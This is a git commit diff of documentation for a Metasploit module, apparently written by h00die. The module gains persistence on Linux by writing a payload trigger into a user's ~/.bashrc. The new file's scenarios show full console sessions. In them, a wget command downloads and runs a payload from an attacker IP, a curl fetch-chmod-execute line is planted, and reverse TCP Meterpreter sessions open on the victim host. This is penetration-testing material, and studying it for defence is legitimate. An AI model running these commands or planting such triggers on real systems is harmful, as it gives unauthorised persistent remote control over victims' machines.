update bash_profile to persistence mixin
This commit is contained in:
h00die
@@ -1,50 +0,0 @@
|
||||
## Description
|
||||
|
||||
This module establishes persistence via the Linux Bash profile method.
|
||||
This module makes two changes to the target system.
|
||||
First, the module writes a payload to a directory (`/var/temp/` by default).
|
||||
Second, the module writes a payload execution trigger to the Bash profile (`~/.bashrc` by default).
|
||||
The persistent payload is executed whenever the victim user opens a Bash terminal.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
This module has been tested successfully on:
|
||||
|
||||
* Ubuntu 19 (x86_64) running GNU bash, version 5.0.3(1)-release
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. Get a Meterpreter session
|
||||
3. `use exploit/linux/local/bash_profile_persistence`
|
||||
4. `set SESSION [SESSION]`
|
||||
5. `run`
|
||||
6. On victim, open a new Bash terminal
|
||||
7. You should get a new session with the permissions of the exploited user account
|
||||
|
||||
## Options
|
||||
|
||||
**BASH_PROFILE**
|
||||
|
||||
The path to the target Bash profile. (default: `~/.bashrc`)
|
||||
|
||||
**PAYLOAD_DIR**
|
||||
|
||||
A writable directory file system path. (default: `/var/tmp`)
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf > use exploit/linux/local/bash_profile_persistence
|
||||
msf exploit(linux/local/bash_profile_persistence) > set SESSION 1
|
||||
msf exploit(linux/local/bash_profile_persistence) > exploit
|
||||
|
||||
[*] Bash profile exists: /home/user/.bashrc
|
||||
[*] Bash profile is writable: /home/user/.bashrc
|
||||
[*] Created backup Bash profile: /root/.msf4/logs/persistence/192.168.1.191_20191128.130945_Bash_Profile.backup
|
||||
[*] Writing '/var/tmp/IgHypGLMglheQ' (126 bytes) ...
|
||||
[+] Wrote payload trigger to Bash profile
|
||||
[!] Payload will be triggered when target opens a Bash terminal
|
||||
[!] Don't forget to start your handler:
|
||||
[!] msf> handler -H 0.0.0.0 -P 4444 -p cmd/unix/reverse_python
|
||||
```
|
||||
@@ -0,0 +1,111 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module writes an execution trigger to the target's Bash profile.
|
||||
The execution trigger executes a call back payload whenever the target
|
||||
user opens a Bash terminal.
|
||||
|
||||
Verified on Ubuntu 22.04 and 18.04 desktop with Gnome
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. Get a Meterpreter session
|
||||
3. `use exploit/linux/local/bash_profile_persistence`
|
||||
4. `set SESSION [SESSION]`
|
||||
5. `run`
|
||||
6. On victim, open a new Bash terminal
|
||||
7. You should get a new session with the permissions of the exploited user account
|
||||
|
||||
## Options
|
||||
|
||||
### BASH_PROFILE
|
||||
|
||||
The path to the target Bash profile. Defaults to `.bashrc`
|
||||
|
||||
### PAYLOAD_NAME
|
||||
|
||||
Name of the payload file. Defaults to random
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Ubuntu 18.04.3
|
||||
|
||||
Initial access vector via web delivery
|
||||
|
||||
```
|
||||
[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
|
||||
resource (/root/.msf4/msfconsole.rc)> setg verbose true
|
||||
verbose => true
|
||||
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
|
||||
lhost => 111.111.1.111
|
||||
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
|
||||
[*] Using configured payload python/meterpreter/reverse_tcp
|
||||
resource (/root/.msf4/msfconsole.rc)> set srvport 8181
|
||||
srvport => 8181
|
||||
resource (/root/.msf4/msfconsole.rc)> set target 7
|
||||
target => 7
|
||||
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
|
||||
payload => linux/x64/meterpreter/reverse_tcp
|
||||
resource (/root/.msf4/msfconsole.rc)> set lport 4545
|
||||
lport => 4545
|
||||
resource (/root/.msf4/msfconsole.rc)> set URIPATH l
|
||||
URIPATH => l
|
||||
resource (/root/.msf4/msfconsole.rc)> run
|
||||
[*] Exploit running as background job 0.
|
||||
[*] Exploit completed, but no session was created.
|
||||
[*] Starting persistent handler(s)...
|
||||
[*] Started reverse TCP handler on 111.111.1.111:4545
|
||||
[*] Using URL: http://111.111.1.111:8181/l
|
||||
[*] Server started.
|
||||
[*] Run the following command on the target machine:
|
||||
wget -qO O2XZweCh --no-check-certificate http://111.111.1.111:8181/l; chmod +x O2XZweCh; ./O2XZweCh& disown
|
||||
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > [*] 222.222.2.222 web_delivery - Delivering Payload (250 bytes)
|
||||
[*] Transmitting intermediate stager...(126 bytes)
|
||||
[*] Sending stage (3045380 bytes) to 222.222.2.222
|
||||
[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.222:44878) at 2025-02-06 21:11:39 -0500
|
||||
```
|
||||
|
||||
Persistence
|
||||
|
||||
```
|
||||
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/bash_profile
|
||||
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
|
||||
[msf](Jobs:1 Agents:1) exploit(linux/persistence/bash_profile) > set session 1
|
||||
session => 1
|
||||
[msf](Jobs:1 Agents:1) exploit(linux/persistence/bash_profile) > exploit
|
||||
[*] Command to run on remote host: curl -so ./QfTygMjF http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./QfTygMjF;./QfTygMjF&
|
||||
[*] Exploit running as background job 1.
|
||||
[*] Exploit completed, but no session was created.
|
||||
[msf](Jobs:2 Agents:1) exploit(linux/persistence/bash_profile) >
|
||||
[*] Fetch handler listening on 111.111.1.111:8080
|
||||
[*] HTTP server started
|
||||
[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg
|
||||
[*] Started reverse TCP handler on 111.111.1.111:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] Bash profile exists: /home/ubuntu/.bashrc
|
||||
[+] Bash profile is writable: /home/ubuntu/.bashrc
|
||||
[!] The service is running, but could not be validated. Bash profile exists and is writable: /home/ubuntu/.bashrc
|
||||
[*] Created backup Bash profile: /root/.msf4/loot/20250206211215_default_222.222.2.222_desktop..bashrc_080965.txt
|
||||
[*] Writing '/tmp/BfkldKp4' (100 bytes) ...
|
||||
[*] Created Bash profile persistence
|
||||
[+] Payload will be triggered when target opens a Bash terminal
|
||||
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/ubuntu18desktop.local_20250206.1216/ubuntu18desktop.local_20250206.1216.rc
|
||||
```
|
||||
On the remote host open `/bin/bash`
|
||||
|
||||
```
|
||||
[*] Client 222.222.2.222 requested /Hg3DGEu9GqlWD06kh4AzFg
|
||||
[*] Sending payload to 222.222.2.222 (curl/7.58.0)
|
||||
[*] Transmitting intermediate stager...(126 bytes)
|
||||
[*] Sending stage (3045380 bytes) to 222.222.2.222
|
||||
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:40990) at 2025-02-06 21:12:21 -0500
|
||||
[msf](Jobs:2 Agents:2) exploit(linux/persistence/bash_profile) > sessions -i 2
|
||||
[*] Starting interaction with 2...
|
||||
(Meterpreter 2)(/tmp) > sysinfo
|
||||
Computer : ubuntu18desktop.local
|
||||
OS : Ubuntu 18.04 (Linux 5.4.0-150-generic)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
(Meterpreter 2)(/tmp) >
|
||||
```
|
||||
Reference in New Issue
Block a user